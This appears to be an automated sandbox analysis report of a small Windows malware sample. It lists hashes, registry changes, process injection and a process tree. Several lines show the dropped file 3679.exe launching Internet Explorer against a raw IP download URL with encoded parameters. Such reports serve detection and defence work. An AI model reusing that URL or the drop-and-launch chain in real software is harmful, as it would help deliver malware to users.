Analysis
-
max time kernel
94s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25/09/2024, 03:56
Static task
static1
Behavioral task
behavioral1
Sample
f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe
-
Size
17KB
-
MD5
f51faecef4676ac8b342144cc8e6219d
-
SHA1
6fd7929033004c7005f04685a16414de54806997
-
SHA256
e4bce97cae52c9cfc77cbe0ca24eb509080c31e2f49f76f7788b9344ac205d6f
-
SHA512
114f4755562b4d89dddeeebdd4f29d440258d2b9ffb9097479ae857c78b0eb63659240142a2ee2092fe2717491b78a850e6e58f52ec2e66567059579e303b206
-
SSDEEP
384:K84Wc753gHTSisRiK43LDI6sEKyePd1VONUiBk:QWc75JisHqLzsEKdn
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3972 3679.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\3679.exe f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3679.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{29B28BE8-7AF2-11EF-818E-4E01FFCF908D} = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{2FAD305F-7AF2-11EF-818E-4E01FFCF908D} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{1F41DD65-7AF2-11EF-818E-4E01FFCF908D} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{35AA3891-7AF2-11EF-818E-4E01FFCF908D} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3936 IEXPLORE.EXE 2024 IEXPLORE.EXE 5020 IEXPLORE.EXE 888 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 18 IoCs
pid Process 1856 f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe 3972 3679.exe 3936 IEXPLORE.EXE 3936 IEXPLORE.EXE 4976 IEXPLORE.EXE 4976 IEXPLORE.EXE 2024 IEXPLORE.EXE 2024 IEXPLORE.EXE 3980 IEXPLORE.EXE 3980 IEXPLORE.EXE 5020 IEXPLORE.EXE 5020 IEXPLORE.EXE 968 IEXPLORE.EXE 968 IEXPLORE.EXE 888 IEXPLORE.EXE 888 IEXPLORE.EXE 1236 IEXPLORE.EXE 1236 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 1856 wrote to memory of 3972 1856 f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe 83 PID 1856 wrote to memory of 3972 1856 f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe 83 PID 1856 wrote to memory of 3972 1856 f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe 83 PID 3972 wrote to memory of 3936 3972 3679.exe 84 PID 3972 wrote to memory of 3936 3972 3679.exe 84 PID 3936 wrote to memory of 4976 3936 IEXPLORE.EXE 85 PID 3936 wrote to memory of 4976 3936 IEXPLORE.EXE 85 PID 3936 wrote to memory of 4976 3936 IEXPLORE.EXE 85 PID 3972 wrote to memory of 2024 3972 3679.exe 92 PID 3972 wrote to memory of 2024 3972 3679.exe 92 PID 2024 wrote to memory of 3980 2024 IEXPLORE.EXE 93 PID 2024 wrote to memory of 3980 2024 IEXPLORE.EXE 93 PID 2024 wrote to memory of 3980 2024 IEXPLORE.EXE 93 PID 3972 wrote to memory of 5020 3972 3679.exe 94 PID 3972 wrote to memory of 5020 3972 3679.exe 94 PID 5020 wrote to memory of 968 5020 IEXPLORE.EXE 95 PID 5020 wrote to memory of 968 5020 IEXPLORE.EXE 95 PID 5020 wrote to memory of 968 5020 IEXPLORE.EXE 95 PID 3972 wrote to memory of 888 3972 3679.exe 98 PID 3972 wrote to memory of 888 3972 3679.exe 98 PID 888 wrote to memory of 1236 888 IEXPLORE.EXE 99 PID 888 wrote to memory of 1236 888 IEXPLORE.EXE 99 PID 888 wrote to memory of 1236 888 IEXPLORE.EXE 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\3679.exeC:\Windows\3679.exe -r2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down7/down/?s=C2AECCE3AFC3BBB7B89ACCA581B5E1BF&t=9/25/2024 3:56:20 AM&v=C1D3B8E3B1B191A0B3BEBCA0&n=C7AFD1B1B7B3AFCAB99BC0AD3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3936 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4976
-
-
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down7/down/?s=C2AECCE3AFC3BBB7B89ACCA581B5E1BF&t=9/25/2024 3:56:38 AM&v=C1D3B8E3B1B191A0B3BEBCA0&n=C7AFD1B1B7B3AFCAB99BC0AD3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2024 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3980
-
-
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down7/down/?s=C2AECCE3AFC3BBB7B89ACCA581B5E1BF&t=9/25/2024 3:56:48 AM&v=C1D3B8E3B1B191A0B3BEBCA0&n=C7AFD1B1B7B3AFCAB99BC0AD3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5020 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:968
-
-
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down7/down/?s=C2AECCE3AFC3BBB7B89ACCA581B5E1BF&t=9/25/2024 3:56:58 AM&v=C1D3B8E3B1B191A0B3BEBCA0&n=C7AFD1B1B7B3AFCAB99BC0AD3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:888 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1236
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{1F41DD65-7AF2-11EF-818E-4E01FFCF908D}.dat
Filesize5KB
MD56880c0552a2cb6f811ed34d313f84ffb
SHA1c45604e04e2392fa4a67a2283ab6f4bc14f81718
SHA2565acd736d5f31cbc527aa588a93165c2369ff263d500d8f28639e5aa78769c0b3
SHA51248420fd1c25c292f474cff79f4485bb7f8f62e175453e9befe95d3228098f66a3eacc4d10a6ed87aa0b2825c89f89c548b44cbbd30df0af3c06969ed882d82d8
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{29B28BE8-7AF2-11EF-818E-4E01FFCF908D}.dat
Filesize5KB
MD516f078e4f29a8b332d07e28ec6c9f554
SHA1f282ca42252f8887233023a1661d4bc1765d738f
SHA256e29165c73305f95669c138e854fbebf8914b6b74383ff55d3fa8d028087e961e
SHA51233e7134bd5c2d4025dc4b45294c334be65f995c4df4a39d25e387b0b32354e9ab8d3f9ec70abd09cbd3d802a17548681d7096ba715ad68d447429e336da7540b
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{2FAD305F-7AF2-11EF-818E-4E01FFCF908D}.dat
Filesize5KB
MD5bd6a19fee31c321bb329dfa9e1cdabb8
SHA104cf690f9af1ccd89d1c70c02b7fbe739b5f0363
SHA2563c4f2230b907535bbcc5d7432b4b645835b4403a0e6b2e7d4e0ad5295735b975
SHA51297b09075f0b2f0f518ba7982a048a5663a5c29d6505e2279c7bff7c924a0bcd4f8ee8aba34672441e2bcbb8b1f98b74af1c29ce2bab23fadeaaac34ff21fba83
-
Filesize
17KB
MD5f51faecef4676ac8b342144cc8e6219d
SHA16fd7929033004c7005f04685a16414de54806997
SHA256e4bce97cae52c9cfc77cbe0ca24eb509080c31e2f49f76f7788b9344ac205d6f
SHA512114f4755562b4d89dddeeebdd4f29d440258d2b9ffb9097479ae857c78b0eb63659240142a2ee2092fe2717491b78a850e6e58f52ec2e66567059579e303b206